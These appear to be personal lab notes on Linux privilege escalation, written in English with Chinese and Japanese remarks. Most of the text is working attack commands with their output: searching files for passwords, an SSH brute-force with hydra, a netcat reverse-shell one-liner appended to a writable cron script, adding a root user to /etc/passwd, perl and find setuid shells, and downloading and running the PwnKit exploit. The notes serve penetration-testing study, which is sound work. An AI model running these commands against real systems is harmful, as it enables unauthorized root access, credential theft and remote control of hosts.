17. Linux Privilege Escalation

[WDavid404]

• Enumerating Linux
• Exposed Confidential Information
• Insecure File Permissions
• Abusing System Linux components

[WDavid404]

17.1. Enumerating Linux

Manual Enumeration

joe@debian-privesc:~$ cat /etc/passwd
....
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash

Login Shell: "/bin/bash" - Indicates the default interactive shell, if one exists. system services are configured with the /usr/sbin/nologin as login shell, where the nologin statement is used to block any remote or local login for service accounts.

hostname
cat /proc/version  （可以看到gcc version）
cat /etc/issue
cat /etc/os-release
uname -a
uname -ar (kernel exploits)
routel
ss -anp
netstat -tlpn  
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
cat /etc/crontab
cat /etc/cron.d 
crontab -l
sudo crontab -l
grep "CRON" /var/log/syslog
dpkg -l
dpkg -l | grep -i 'mysql' --->可以查到目前安装的mysql的版本号，进一步利用searchsploit查看当前版本号是否存在vuln
find / -writable -type d 2>/dev/null
cat /etc/fstab 
mount
lsblk
lsmod
/sbin/modinfo libata
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null 

cat /etc/passwd | grep bash（List of users in the system）

cat .bash_history (passwords saved in history)
env (passwords saved in environment variable)
cat /etc/*-release (kernel exploits)
sudo --version (public exploits)
id (check for docker and lxd group)
ls -la /etc/passwd (writable /etc/passwd)
ls -la /etc/shadow (writeable /etc/shadow)
ps aux | grep -i "root" --color=auto

cd /home
grep -rnH "password" .

cd /var/www/
grep -rnH "password" .

find . -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|user 

https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1764384596 https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1767980521

Automated Enumeration

linpeas

# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors

unix-privesc-check tool

./unix-privesc-check standard > output.txt 对于output.txt查看warning的地方

[WDavid404]

17.2. Exposed Confidential Information

17.2.1. Inspecting User Trails

env cat .bashrc

方法1: 利用env发现预设定的密码（credential）

Interestingly, the SCRIPT_CREDENTIALS variable holds a value that resembles a password. To confirm that we are dealing with a permanent variable, we need to inspect the .bashrc configuration file.

在下面命令里输入“lab”作为password，从而切换到root用户

joe@debian-privesc:~$ su - root
Password:

方法2，

kali@kali:~$ crunch 6 6 -t Lab%%% > wordlist
kali@kali:~$ hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

17.2.2. Inspecting Service Footprints

joe@debian-privesc:~$ watch -n 1 "ps -aux | grep pass"

joe@debian-privesc:~$ sudo tcpdump -i lo -A | grep "pass"

[WDavid404]

17.3. Insecure File Permissions

17.3.1. Abusing Cron Jobs

we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (/var/log/cron.log) for running cron jobs: joe@debian-privesc:~$ grep "CRON" /var/log/syslog

The script itself is fairly straight-forward: it simply copies the user's home directory to the backups subdirectory. The permissions of the script reveal that every local user can write to the file. Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell one-liner.

joe@debian-privesc:~$ cd .scripts
joe@debian-privesc:~/.scripts$ echo >> user_backups.sh
joe@debian-privesc:~/.scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh

joe@debian-privesc:~/.scripts$ cat user_backups.sh
#!/bin/bash
cp -rf /home/joe/ /var/backups/joe/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f

这样在kali machine上就可以收到root id的reverse shell了

练习

可疑的cronb如下

[WDavid404]

17.3.2. Abusing Password Authentication

To escalate our privileges, let's add another superuser (root2) and the corresponding password hash to /etc/passwd. We will first generate the password hash using the openss tool and the passwd argument. By default, if no other option is specified, openssl will generate a hash using the crypt algorithm, a supported hashing mechanism for Linux authentication.

前提条件：/etc/passwd有write权限

The output of the OpenSSL passwd command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format.

joe@debian-privesc:~$ openssl passwd w00t
Fdzt.eqJQ4s0g

joe@debian-privesc:~$ echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

joe@debian-privesc:~$ su root2
Password: w00t

root@debian-privesc:/home/joe# id
uid=0(root) gid=0(root) groups=0(root)

[WDavid404]

17.4. Insecure System Components

17.4.1. Abusing Setuid Binaries and Capabilities

The SUID flag is depicted with the s flag in the above output. This flag can be configured using the chmod u+s command, and it sets the effective UID of the running process to the executable owner's user ID - in this case root's.

Example: find program joe@debian-privesc:~$ find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

Another set of features subject to privilege escalation techniques are Linux capabilities. Capabilities are extra attributes that can be applied to processes, binaries, and services to assign specific privileges normally reserved for administrative operations, such as traffic capturing or adding kernel modules. Similarly to setuid binaries, if misconfigured, these capabilities could allow an attacker to elevate their privileges to root.

getcap joe@debian-privesc:~$ /usr/sbin/getcap -r / 2>/dev/null

The two perl binaries stand out as they have setuid capabilities enabled, along with the +ep flag specifying that these capabilities are effective and permitted.

利用GTFOBINS网站 （https://gtfobins.github.io/）

joe@debian-privesc:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
perl: warning: Setting locale failed.
...
# id
uid=0(root) gid=1000(joe) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)

17.4.2. Abusing Sudo

Command: sudo -l https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1764384596 看“Privilege Escalation: Sudo”的内容

另外： AppArmor is a kernel module that provides mandatory access control (MAC) on Linux systems by running various application-specific profiles, and it's enabled by default on Debian 10. We can verify AppArmor's status as the root user using the aa-status command.

confirms that tcpdump is actively protected with a dedicated AppArmor profile　--》 所以即使tcpdump在我们的sudo -l结果里也无法使用它进行escalation

## 17.4.3. Exploiting Kernel Vulnerabilities
joe@ubuntu-privesc:~$ cat /etc/issue
Ubuntu 16.04.4 LTS \n \l

joe@ubuntu-privesc:~$ uname -r 
4.4.0-116-generic

joe@ubuntu-privesc:~$ arch 
x86_64

kali@kali:~$ searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"

[WDavid404]

Lab

PwnKit

PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation https://github.com/ly4k/PwnKit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

CVE-2021-4034の緩和策 一時的な緩和策は、pkexec の機能を犠牲にする方法があります。SUID パーミッションを削除することで、このプログラムは root としてプロセスを実行できません。しかし、正常な動作のためにそれに依存しているプロセスは影響を受けます。SUID パーミッションは、次のように chmod で削除できます： chmod 0755 /usr/bin/pkexec https://www.scsk.jp/sp/sysdig/blog/container_security/cve-2021-4034_pwnkit.html